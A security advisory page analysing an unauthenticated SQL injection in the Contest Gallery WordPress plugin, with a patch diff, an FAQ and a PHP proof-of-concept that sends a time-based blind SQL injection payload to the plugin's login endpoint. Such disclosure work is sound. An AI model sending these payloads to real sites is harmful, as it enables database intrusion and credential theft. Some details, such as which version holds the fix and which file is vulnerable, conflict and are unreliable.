Atomic Edge analysis of CVE-2026-3180:
The root cause is insufficient input sanitization and a lack of prepared statements in SQL queries within the Contest Gallery WordPress plugin. The vulnerability exists in the `cg-user-functions.php` file, specifically in the `cgLostPasswordEmail` function’s SQL query. The query directly concatenates the user-controlled `$ReceiverMail` variable (populated from the `cgLostPasswordEmail` and `cgl_mail` parameters) into the SQL statement without proper escaping. This allows an unauthenticated attacker to inject arbitrary SQL commands via these parameters. The attack vector is a crafted HTTP request to the plugin’s password reset or user login functionality. Exploitation involves sending a payload like `’ OR 1=1–` within the vulnerable parameters to manipulate the SQL query, enabling blind SQL injection for data extraction. The patch, applied in versions 28.1.4 and 28.1.5, replaces the vulnerable string concatenation with a prepared statement using `$wpdb->prepare()`. The `%s` placeholder ensures the user input is properly escaped and treated as a string literal, neutralizing the injection. The impact is a high-severity information disclosure, allowing attackers to extract sensitive data from the WordPress database, including user credentials and plugin-specific information.
CVE-2026-3180: Contest Gallery <= 28.1.4 – Unauthenticated SQL Injection (contest-gallery)
CVE-2026-3180
contest-gallery
28.1.4
28.1.5
Analysis Overview
Differential between vulnerable and patched code
--- a/contest-gallery/functions/general/cg-get-version.php
+++ b/contest-gallery/functions/general/cg-get-version.php
@@ -17,7 +17,7 @@
if(!function_exists('cg_get_version_for_scripts')){
function cg_get_version_for_scripts () {
/**###NORMAL###**/
- return '28.1.4';
+ return '28.1.5';
/**###NORMAL-END###**/
}
}
No newline at end of file
--- a/contest-gallery/functions/general/cg-user-functions.php
+++ b/contest-gallery/functions/general/cg-user-functions.php
@@ -137,16 +137,19 @@
$posUrl = '$regurl$';
if(empty($old_activation_key)){
- $row = $wpdb->get_row("SELECT Field_Content, activation_key
+ $row = $wpdb->get_row($wpdb->prepare(
+ "SELECT Field_Content, activation_key
FROM $tablenameCreateUserEntries
WHERE activation_key = (
SELECT activation_key
FROM $tablenameCreateUserEntries
WHERE (Field_Type = 'main-mail' OR Field_Type = 'unconfirmed-mail')
- AND Field_Content = '$ReceiverMail'
+ AND Field_Content = %s
LIMIT 1
)
-LIMIT 1;");
+ LIMIT 1;",
+ $ReceiverMail
+ ));
$old_activation_key = $row->activation_key;
}
--- a/contest-gallery/index.php
+++ b/contest-gallery/index.php
@@ -2,7 +2,7 @@
/*
Plugin Name: Contest Gallery
Description: Upload form, files, photos and videos upload contest gallery plugin for WordPress. Create upload forms for entries with or without file/image upload. Create user registration form. Create login form. Create responsive galleries and allow to vote for any kind of entries. Sell entries via PayPal or Stripe API. Create or edit images via OpenAI API.
-Version: 28.1.4
+Version: 28.1.5
Author: Contest Gallery
Plugin URI: https://www.contest-gallery.com
Author URI: https://www.contest-gallery.com
--- a/contest-gallery/v10/v10-admin/gallery/show-comments.php
+++ b/contest-gallery/v10/v10-admin/gallery/show-comments.php
@@ -10,20 +10,33 @@
$table_posts = $wpdb->prefix."posts";
$table_wp_users = $wpdb->base_prefix."users";
-$galeryNR=$_GET['option_id'];
+$galeryNR=absint($_GET['option_id']);
$pid=0;
if(!empty($_GET['id'])){
- $pid=$_GET['id'];
+ $pid=absint($_GET['id']);
}
$GalleryID = $galeryNR;
-$cgOptions = $wpdb->get_row("SELECT GalleryName, Version FROM $tablenameOptions WHERE id = '$galeryNR'");
+// Get gallery options by ID
+$cgOptions = $wpdb->get_row($wpdb->prepare(
+ "SELECT GalleryName, Version
+ FROM $tablenameOptions
+ WHERE id = %d",
+ $galeryNR
+));
+
$GalleryName = $cgOptions->GalleryName;
$Version = $cgOptions->Version;
-$proOptions = $wpdb->get_row("SELECT * FROM $tablename_pro_options WHERE GalleryID = '$GalleryID'");
+// Fetch professional options by Gallery ID
+$proOptions = $wpdb->get_row($wpdb->prepare(
+ "SELECT * FROM $tablename_pro_options
+ WHERE GalleryID = %d",
+ $GalleryID
+));
+
$IsModernFiveStar = (!empty($proOptions->IsModernFiveStar)) ? true : false;
if(empty($GalleryName)){
--- a/contest-gallery/v10/v10-admin/users/frontend/login/users-login-check-ajax.php
+++ b/contest-gallery/v10/v10-admin/users/frontend/login/users-login-check-ajax.php
@@ -74,9 +74,19 @@
//Check name or email
if(is_email($cg_login_name_mail)){
- $cgWpData = $wpdb->get_row("SELECT ID, user_login, user_pass FROM $tablenameWpUsers WHERE user_email = '".$cg_login_name_mail."'");
+ $cgWpData = $wpdb->get_row($wpdb->prepare(
+ "SELECT ID, user_login, user_pass
+ FROM $tablenameWpUsers
+ WHERE user_email = %s",
+ $cg_login_name_mail
+ ));
}else{
- $cgWpData = $wpdb->get_row("SELECT ID, user_email, user_pass FROM $tablenameWpUsers WHERE user_login = '".$cg_login_name_mail."'");
+ $cgWpData = $wpdb->get_row($wpdb->prepare(
+ "SELECT ID, user_email, user_pass
+ FROM $tablenameWpUsers
+ WHERE user_login = %s",
+ $cg_login_name_mail
+ ));
}
if(empty($cgWpData)){Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3180 - Contest Gallery <= 28.1.4 - Unauthenticated SQL Injection
<?php
$target_url = 'http://example.com/wp-content/plugins/contest-gallery/v10/v10-admin/users/frontend/login/users-login-check-ajax.php';
// The vulnerable parameter 'cgl_mail' is used in the password reset flow.
// This script demonstrates a time-based blind SQL injection payload.
$payload = "' OR IF(1=1,SLEEP(5),0)--";
$post_data = array(
'cgl_mail' => $payload,
// Other required parameters for the request may be needed based on plugin flow.
'action' => 'cg_lost_password_email'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);
$elapsed = $end_time - $start_time;
if ($elapsed > 5) {
echo "Potential SQL Injection successful. Response delayed by " . round($elapsed, 2) . " seconds.n";
} else {
echo "No delay detected. Target may be patched or unreachable.n";
}
?>Frequently Asked Questions
What is CVE-2026-3180?
Overview of the vulnerabilityCVE-2026-3180 is a high-severity SQL injection vulnerability found in the Contest Gallery plugin for WordPress, affecting versions up to 28.1.4. It allows unauthenticated attackers to inject arbitrary SQL commands through insufficiently sanitized user input.
How does the SQL injection work?
Mechanism of the attackThe vulnerability occurs in the `cgLostPasswordEmail` and `cgl_mail` parameters, where user input is concatenated directly into SQL queries without proper escaping. This allows attackers to manipulate the SQL query to extract sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable installationsAny WordPress site using the Contest Gallery plugin version 28.1.4 or earlier is at risk. Administrators should check their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps for verificationTo check if your site is vulnerable, verify the version of the Contest Gallery plugin in your WordPress admin dashboard. If it is 28.1.4 or earlier, your site is vulnerable to CVE-2026-3180.
How can I fix this vulnerability?
Recommended actionsTo mitigate this vulnerability, update the Contest Gallery plugin to version 28.1.5 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.
What does a CVSS score of 7.5 indicate?
Understanding the severity ratingA CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It implies that exploitation could lead to serious consequences, such as data breaches.
What is the impact of this vulnerability?
Potential consequencesExploitation of this vulnerability can lead to unauthorized access to sensitive data stored in the WordPress database, including user credentials and other confidential information. This can severely compromise site security.
How does the proof of concept demonstrate the vulnerability?
Example of exploitationThe proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a specially crafted HTTP request that includes a malicious payload. This payload triggers the SQL injection, allowing the attacker to manipulate the database.
What are the best practices for WordPress security?
Preventative measuresTo enhance WordPress security, regularly update plugins and themes, use security plugins, implement strong passwords, and perform routine security audits. Monitoring for vulnerabilities is also crucial.
What is SQL injection?
Basic definitionSQL injection is a code injection technique that exploits vulnerabilities in an application’s software by allowing an attacker to interfere with the queries that an application makes to its database. It can lead to unauthorized data access.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategiesIf immediate updates cannot be performed, consider disabling the plugin until it can be updated or implementing additional security measures, such as web application firewalls, to help mitigate the risk.
Is this vulnerability specific to certain server environments?
Environment considerationsCVE-2026-3180 is primarily a vulnerability within the Contest Gallery plugin, not limited to specific server environments. However, the impact may vary based on the overall security posture of the WordPress installation.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
